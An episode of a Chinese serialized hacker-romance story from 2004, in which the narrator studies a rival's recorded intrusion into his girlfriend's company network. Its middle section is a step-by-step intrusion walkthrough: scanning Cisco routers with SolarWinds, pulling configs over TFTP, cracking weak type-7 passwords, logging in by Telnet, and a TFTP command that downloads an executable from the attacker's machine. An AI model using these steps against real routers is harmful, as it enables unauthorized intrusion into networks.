《我的黑客女友》第四回——对CISCO路由器下手

黑客营

陶莉慧 · 2004年12月27日

前情提要:林枫顺利地通过了被称为黑客炼狱的黑客营论坛考核,不料却在论坛里发现黑客“情敌”冷风……

被撕扯的心

冬日里的深夜,阵阵诡秘的冷风从窗缝中悄无声息地窜进来。然而真正让我略感寒意的是对面那个正通过网络与我对视的冷风。他到论坛上这么久以来,不论新老会员,谈起冷风,也无不称赞其为人随和,技艺超群。

此刻我的电脑已经完全在他的掌控之下,正如很久以前他入侵左左的电脑。当然这之前我也试图穷尽我这个菜鸟黑客的全部手段探测他的系统漏洞,却一直无法向前挪动半步。许久,冷风发来消息:刚才听老鹰说你是看到论坛里左左的征婚帖子,才有意和我切磋是吗?论坛上我只是玩笑,让你误会了。顺便确认一下,你真的是左左的男朋友吗?

冷风漫不经心的一句话如鹰喙般凶猛地撕扯开我的心。我不是左左期望的第一个侵入她电脑的人——而这个人应当是冷风。我,仅仅是走了左左念及情面故意开的“后门”。我对着屏幕愣了良久,一种对左左的责任感与良心的亏欠在脑海里扭打作一团。我敲下了“不是”,此时心里尽是无奈的疼痛。

冷风走了。临走的时候,给我传来一个文件——入侵左左电脑的录像。

录像的启示

死记硬背操作是不可能长久进步的,更主要的是对入侵思路的领悟和联想。冷风走的时候丢下了这句话,他说研究这样的入侵截屏录像是很好的学习方法。

冷风知道左左必然部署了严密的防御,所以他先从左左公司的路由器入手,由外向内渗透。CISCO路由器是公司局域网的核心,涉及到的服务和协议也比较繁杂。冷风下载了一个68MB工具——Solarwinds2002。它的界面类似于QQ,在“CISCO TOOLS”选项卡里找到IP Network Browser,双击打开后会出现三个IP输入文本框。只要在Scan an IP Address Range里输入Begining IP Address和Ending IP Address,Solarwinds2002即会开始搜索该IP段有漏洞的服务器(图1)。

51-g8-3.jpg
图1

显然冷风早已知道了左左公司的IP,在Scan a single Device输入后,点击Scan Device进行扫描,得到如图2所示的路由器信息。

51-g8-2.jpg
图2

点击“Config”,查看路由器的Config文件。或者点击“Misellaneous”选项卡,双击“TFTP Server”打开TFTP协议连接器,找到路由器的配置文件。FTP不是一种安全的协议,因为它没有任何认证机制,也就是说不需要口令,入侵者可以很容易地用TFTP请求文件传输,可以用于查看路由配置文件并在文件末尾修改密码。

以下是节选的Config文件末尾部分。

password 915540E1E4A2F1F

login

line vty 5 9

password 915540E1E4A2F1F

login

“password”之后,即是暴露的密码。这是CISCO路由器常见的漏洞。这里的密码是经过“Service password_encryption”加密命令加密过的。用CISCO选项卡里的“Router Password Decryption”即可破解得到真实密码。再回到“Scan Device”界面,点击“TELNET”进行TELNET连接,输入刚才破解出的密码。远程登录(Telnet),允许你与一台远程计算机建立一个终端对话。当用Telnet登录进入远程计算机系统时,事实上启动了两个程序,一个叫Telnet客户程序,它运行在你的本地机上,另一个叫Telnet服务器程序,它运行在你要登录的远程计算机上,本地机上的客户程序要完成相关权限的功能(图3)。

51-g8-1.jpg
图3

现在可以在命令行状态下输入命令执行读写权限。例如输入“C:\>tftp -i 自己的ip get aaa.exe c:\abc\aaa.exe”(此前首先运行了前文提到的TFTP Server)可以把本地的aaa文件上传到对方主机。CISCO口令分为用户访问口令和特权级口令(Enable)。缺省情况下,路由器上所有控制台口令是以明文形式存储在路由器配置中。有两种用于隐藏明文形式的口令:Service password_encryption命令用于加密用户访问口令;enable secret命令用于加密特权级口令。Service password_encryption命令所用的加密算法是一种不太复杂的基于Vigener密码的CISCO专有算法,安全级别低,有大量破解器能反解CISCO口令。

冷风就这样通过左左公司的局域网主机,及左左在内网共享拿到左左电脑的“读”权限。入侵的核心原则,即是此路不通,另劈蹊径。

好心分手

很长一段时间以来,QQ的服务器一直不稳定,我也就一直没有用它。左左在QQ上见不到我便频频发手机短信,我没有回复,也许是不敢正视左左,也许是从内心鄙视自己的懦弱。

老鹰后来问我,当时逃避左左是因为技不如冷风而自卑还是因为你赌气左左骗了你,让你错以为你才是第一个入侵她电脑的人?我摇摇头。我明白,在黑客技术这片汪洋大海上,我才刚刚航行。将来有一天,左左会理解我吗?我不能在别人欺骗性的鼓励下进步,尽管是善意的。我相信我能达到真正黑客的修为。此刻低头看看左左的短信,忽然泪如泉涌。

此后我在黑客炼狱里再没见过左左,或许换了ID,或许没有上线。左左就这样消失在我的视界里。只是听说最近圈内冒出一位女黑客,攻击性极强,每次她在得手后都会留下一串同样的数字,而那竟然是我的生日……